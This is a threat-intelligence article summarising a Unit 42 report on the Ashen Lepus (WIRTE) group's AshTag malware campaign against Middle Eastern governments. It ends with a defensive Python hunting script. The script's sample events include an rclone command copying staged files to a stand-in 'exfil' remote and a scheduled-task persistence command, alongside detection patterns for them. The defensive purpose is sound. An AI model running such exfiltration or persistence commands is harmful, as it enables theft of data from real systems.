Ashen Lepus (WIRTE) Targets Middle East Governments with Stealthy AshTag Malware Toolkit
The Unit 42 team at Palo Alto Networks has documented a prolonged and low-visibility campaign targeting government bodies and diplomatic organizations across the Middle East. The activity is attributed to the Ashen Lepus group, also known as WIRTE, which is linked to Hamas.
According to the report, the group maintained its operational tempo throughout 2025 despite the Israel–Hamas conflict and continued its activities even after the Gaza ceasefire in October 2025. Observations and VirusTotal download data indicate a widening geographic scope: targets now include entities within the Palestinian Authority, Egypt, and Jordan, as well as Oman and Morocco. While the lure themes remain anchored in regional affairs, content related to Turkey and its relations with the Palestinian Authority has appeared with increasing frequency.
The most significant shift is the adoption of a new component set dubbed AshTag. The infection chain typically begins with a seemingly harmless PDF that redirects victims to a file-sharing service hosting a RAR archive. Inside are an executable disguised as a sensitive document, a malicious loader, and an additional decoy PDF. When the executable is launched, it triggers DLL sideloading: a "legitimate" document opens on screen, while subsequent stages quietly unfold in the background to deliver the primary payload.
The report highlights a marked increase in stealth. Payloads are encrypted, executed in memory, and leave fewer forensic traces, while the command-and-control infrastructure is camouflaged as legitimate traffic. Rather than relying on dedicated domains, the attackers register new API and authentication subdomains on legitimate websites, allowing their activity to blend seamlessly into normal network flows.
Further obfuscation is achieved through geofencing and environmental checks, complicating automated analysis and making it harder to reconstruct the full attack chain. Certain data fragments are concealed within HTML page markup, and the C2 server, according to Unit 42, can filter out sandboxes based on geolocation and distinctive user-agent patterns.
AshTag is described as a modular .NET toolkit under active development, designed for remote control and data exfiltration. Its capabilities include system reconnaissance, file operations, downloading and executing additional modules, and persistence via the task scheduler. After the initial compromise, the group shifted to hands-on activity: tailored documents were selected and staged through loaded modules, with files stored in locations such as C:\Users\Public.
In one telemetry-documented incident, Ashen Lepus used rclone to exfiltrate data to an attacker-controlled server. The report notes that this choice lends credibility at the traffic level and aligns with a broader trend in which threat actors leverage legitimate utilities for file transfers, making their operations harder to distinguish from benign activity.
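As an added illustration (not code from Unit 42 or the report), the following hunt runs over constructed process-creation events and flags the three behaviours the article calls out: executables launched from C:\Users\Public, rclone transfers to a named remote, and scheduled tasks whose action lives in the Public directory. The event field names (`image`, `cmdline`) and the `exfil:` remote name are assumptions, not a vendor schema or an observed indicator.

```python
"""Hunt over constructed process-creation events for staging in C:\\Users\\Public,
schtasks persistence and rclone exfiltration; sample data is made up, not telemetry."""
import re

PUBLIC_DIR = re.compile(r"(?i)^c:\\users\\public\\")
# rclone subcommands that move data; a remote is "name:path" (2+ chars, so not a drive letter) or a URL
RCLONE_XFER = {"copy", "sync", "move", "copyto", "moveto"}
REMOTE_ARG = re.compile(r"(?i)^[a-z0-9_-]{2,}:|^https?://")


def classify(event):
    """Return findings for one event: dict with 'image' (full path) and 'cmdline' keys (assumed schema)."""
    image = event["image"]
    argv = [a.strip('"') for a in event["cmdline"].split()]
    name = image.rsplit("\\", 1)[-1].lower()
    findings = []
    if PUBLIC_DIR.match(image):
        findings.append("exec-from-public")
    if name == "rclone.exe" and any(a.lower() in RCLONE_XFER for a in argv[1:]) \
            and any(REMOTE_ARG.match(a) for a in argv[1:]):
        findings.append("rclone-remote-transfer")
    if name == "schtasks.exe" and "/create" in (a.lower() for a in argv) \
            and any(PUBLIC_DIR.match(a) for a in argv):
        findings.append("schtask-persist-public")
    return findings


# constructed sample events (hypothetical paths, task name and remote)
SAMPLE_EVENTS = [
    {"image": r"C:\Users\Public\report.exe", "cmdline": r"C:\Users\Public\report.exe"},
    {"image": r"C:\Users\Public\rclone.exe",
     "cmdline": r"C:\Users\Public\rclone.exe -q copy C:\Users\Public\staging exfil:inbox"},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /sc minute /mo 30 /tn Updater /tr "C:\Users\Public\report.exe"'},
    {"image": r"C:\Program Files\Foo\foo.exe", "cmdline": "foo.exe --normal"},
]


def hunt(events=SAMPLE_EVENTS):
    """Return (image, findings) for every event that produced at least one finding."""
    hits = []
    for e in events:
        f = classify(e)
        if f:
            hits.append((e["image"], f))
    return hits


if __name__ == "__main__":
    for image, findings in hunt():
        print(image, findings)
```

In production the same logic belongs in EDR or SIEM rules keyed on the image path and command line; the benign fourth event shows it stays quiet on ordinary process starts.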